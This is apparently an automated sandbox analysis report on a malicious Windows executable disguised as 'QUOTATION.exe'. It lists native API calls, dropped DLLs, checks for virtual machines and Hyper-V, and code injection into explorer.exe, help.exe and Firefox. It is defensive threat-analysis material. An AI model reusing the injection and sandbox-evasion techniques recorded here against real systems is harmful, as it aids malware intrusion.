Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3374B870	8_2_3374B870
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337A5870	8_2_337A5870
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EF872	8_2_337EF872
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33716868	8_2_33716868
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337D0835	8_2_337D0835
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3375E810	8_2_3375E810
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33733800	8_2_33733800
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E78F3	8_2_337E78F3
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E18DA	8_2_337E18DA
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337328C0	8_2_337328C0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337A98B2	8_2_337A98B2
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33746882	8_2_33746882
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EFF63	8_2_337EFF63
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337AFF40	8_2_337AFF40
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3373CF00	8_2_3373CF00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33736FE0	8_2_33736FE0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E1FC6	8_2_337E1FC6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EEFBF	8_2_337EEFBF
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337D0E6D	8_2_337D0E6D
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33772E48	8_2_33772E48
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33722EE8	8_2_33722EE8
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E9ED2	8_2_337E9ED2
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33731EB2	8_2_33731EB2
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E0EAD	8_2_337E0EAD
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33730D69	8_2_33730D69
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EFD27	8_2_337EFD27
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3372AD00	8_2_3372AD00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337CFDF4	8_2_337CFDF4
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33739DD0	8_2_33739DD0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33742DB0	8_2_33742DB0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33733C60	8_2_33733C60
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337E6C69	8_2_337E6C69
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337EEC60	8_2_337EEC60
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337DEC4C	8_2_337DEC4C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_3373AC20	8_2_3373AC20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337AEC20	8_2_337AEC20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33720C12	8_2_33720C12
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337B7CE8	8_2_337B7CE8
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337FACEB	8_2_337FACEB
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33748CDF	8_2_33748CDF
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337C9C98	8_2_337C9C98

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 33777BE4 appears 96 times
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 3379E692 appears 86 times
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 337AEF10 appears 104 times
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 33765050 appears 35 times
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: String function: 3371B910 appears 268 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337634E0 NtCreateMutant,LdrInitializeThunk,	8_2_337634E0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762B10 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_33762B10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762BC0 NtQueryInformationToken,LdrInitializeThunk,	8_2_33762BC0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762B90 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_33762B90
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337629F0 NtReadFile,LdrInitializeThunk,	8_2_337629F0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762F00 NtCreateFile,LdrInitializeThunk,	8_2_33762F00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762E50 NtCreateSection,LdrInitializeThunk,	8_2_33762E50
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762ED0 NtResumeThread,LdrInitializeThunk,	8_2_33762ED0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762EB0 NtProtectVirtualMemory,LdrInitializeThunk,	8_2_33762EB0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762D10 NtQuerySystemInformation,LdrInitializeThunk,	8_2_33762D10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_33762DC0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762DA0 NtReadVirtualMemory,LdrInitializeThunk,	8_2_33762DA0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762C50 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_33762C50
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762C30 NtMapViewOfSection,LdrInitializeThunk,	8_2_33762C30
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762CF0 NtDelayExecution,LdrInitializeThunk,	8_2_33762CF0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33764260 NtSetContextThread,	8_2_33764260
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33764570 NtSuspendThread,	8_2_33764570
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762B20 NtQueryInformationProcess,	8_2_33762B20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762B00 NtQueryValueKey,	8_2_33762B00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762BE0 NtQueryVirtualMemory,	8_2_33762BE0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762B80 NtCreateKey,	8_2_33762B80
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762A10 NtWriteFile,	8_2_33762A10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762AC0 NtEnumerateValueKey,	8_2_33762AC0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762AA0 NtQueryInformationFile,	8_2_33762AA0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762A80 NtClose,	8_2_33762A80
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337629D0 NtWaitForSingleObject,	8_2_337629D0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337638D0 NtGetContextThread,	8_2_337638D0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762F30 NtOpenDirectoryObject,	8_2_33762F30
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762FB0 NtSetValueKey,	8_2_33762FB0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762E00 NtQueueApcThread,	8_2_33762E00
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762EC0 NtQuerySection,	8_2_33762EC0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762E80 NtCreateProcessEx,	8_2_33762E80
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762D50 NtWriteVirtualMemory,	8_2_33762D50
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33763C30 NtOpenProcessToken,	8_2_33763C30
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762C20 NtSetInformationFile,	8_2_33762C20
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762C10 NtOpenProcess,	8_2_33762C10
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33762CD0 NtEnumerateKey,	8_2_33762CD0
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_33763C90 NtOpenThread,	8_2_33763C90

PE file contains executable resources (Code or Archives)

Source: System.dll.2.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: System.Security.Cryptography.X509Certificates.dll.2.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: QUOTATION.exe, 00000002.00000003.3070142843.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemaintenanceservice.exe0 vs QUOTATION.exe
Source: QUOTATION.exe, 00000002.00000003.3062330160.00000000028C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs QUOTATION.exe
Source: QUOTATION.exe, 00000002.00000003.3066562321.00000000028CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.dll@ vs QUOTATION.exe
Source: QUOTATION.exe, 00000002.00000003.3065006946.0000000004E8F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs QUOTATION.exe
Source: QUOTATION.exe, 00000002.00000003.3068674959.00000000028CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs QUOTATION.exe
Source: QUOTATION.exe, 00000002.00000002.3671365540.0000000000436000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000003.4192719473.0000000033671000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000002.4314495070.00000000034D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000002.4328211307.000000003381D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000002.4282050831.00000000000E4000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000003.4186562226.00000000334B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000002.4328211307.00000000339C0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000000.3525394295.0000000000436000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe
Source: QUOTATION.exe, 00000008.00000002.4314495070.000000000348E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs QUOTATION.exe
Source: QUOTATION.exe	Binary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs QUOTATION.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: edgegdi.dll	Jump to behavior

PE / OLE file has an invalid certificate

Source: QUOTATION.exe

Static PE information: invalid certificate

PE file contains more sections than normal

Source: percentile.dll.2.dr	Static PE information: Number of sections : 19 > 10
Source: libdatrie-1.dll.2.dr	Static PE information: Number of sections : 11 > 10
Source: libpkcs11-helper-1.dll.2.dr	Static PE information: Number of sections : 12 > 10

Source: QUOTATION.exe	Virustotal: Detection: 28%
Source: QUOTATION.exe	ReversingLabs: Detection: 33%

Source: C:\Users\user\Desktop\QUOTATION.exe

File read: C:\Users\user\Desktop\QUOTATION.exe

Source: unknown	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\QUOTATION.exe	Process created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: Yara match	File source: 00000002.00000002.3674014091.0000000004F87000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.3060874680.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4282173420.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3674014091.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Industrialization\Snoldets\Embrocates\Utaalmodiges.Taa169, type: DROPPED

Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_6F602F60 push eax; ret	2_2_6F602F8E
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E808C9 pushfd ; retf	2_2_04E808CA
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E866CD push cs; retf	2_2_04E866CE
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E86E92 push cs; retf	2_2_04E86EDA
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E84868 push D6704826h; ret	2_2_04E84873
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E83A61 push ecx; retf	2_2_04E83A64
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E83A75 push ecx; retf	2_2_04E83A64
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E87819 pushad ; ret	2_2_04E8781C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 2_2_04E86378 push cs; retf	2_2_04E8637A
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_337208CD push ecx; mov dword ptr [esp], ecx	8_2_337208D6
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01664868 push D6704826h; ret	8_2_01664873
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01667819 pushad ; ret	8_2_0166781C
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_016608C9 pushfd ; retf	8_2_016608CA
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01666378 push cs; retf	8_2_0166637A
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01663A61 push ecx; retf	8_2_01663A64
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01663A75 push ecx; retf	8_2_01663A64
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_016666CD push cs; retf	8_2_016666CE
Source: C:\Users\user\Desktop\QUOTATION.exe	Code function: 8_2_01666E92 push cs; retf	8_2_01666EDA

Source: libdatrie-1.dll.2.dr	Static PE information: section name: .xdata
Source: libpkcs11-helper-1.dll.2.dr	Static PE information: section name: .xdata
Source: maintenanceservice2.exe.2.dr	Static PE information: section name: .00cfg
Source: percentile.dll.2.dr	Static PE information: section name: .xdata
Source: percentile.dll.2.dr	Static PE information: section name: /4
Source: percentile.dll.2.dr	Static PE information: section name: /19
Source: percentile.dll.2.dr	Static PE information: section name: /31
Source: percentile.dll.2.dr	Static PE information: section name: /45
Source: percentile.dll.2.dr	Static PE information: section name: /57
Source: percentile.dll.2.dr	Static PE information: section name: /70
Source: percentile.dll.2.dr	Static PE information: section name: /81
Source: percentile.dll.2.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Temp\nsg9F21.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3992	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 3320	Thread sleep count: 107 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 3320	Thread sleep time: -214000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Alswith\Peroxidisement\Foresprges87\SolutionExplorerCLI.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.Security.Cryptography.X509Certificates.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\maintenanceservice2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\percentile.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Wept\libpkcs11-helper-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\QUOTATION.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dll	Jump to dropped file

Source: C:\Users\user\Desktop\QUOTATION.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\QUOTATION.exe	API call chain: ExitProcess graph end node

Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000009.00000003.4737750627.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4742907497.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035943972.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4746888738.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6462913242.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.0000000010AD1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW:\x1"S
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: QUOTATION.exe, 00000008.00000003.4189935994.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4313926438.0000000003418000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4925755619.0000000010A13000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4923558287.0000000010A13000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6308723662.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.6313657253.0000000010A15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.4747263289.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8033791122.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.4229381389.00000000106FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.8035395623.0000000010A15000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: QUOTATION.exe, 00000008.00000003.4189935994.000000000347B000.00000004.00000020.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4314495070.000000000347B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~L
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: QUOTATION.exe, 00000002.00000002.3704962508.00000000069C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: QUOTATION.exe, 00000008.00000002.4315161557.0000000004D59000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\SysWOW64\help.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Section loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION.exe	Thread register set: target process: 4812			Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Thread register set: target process: 4812			Jump to behavior

Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000009.00000000.4199991532.0000000001530000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.8008145351.0000000004CC0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.7998474885.0000000001530000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
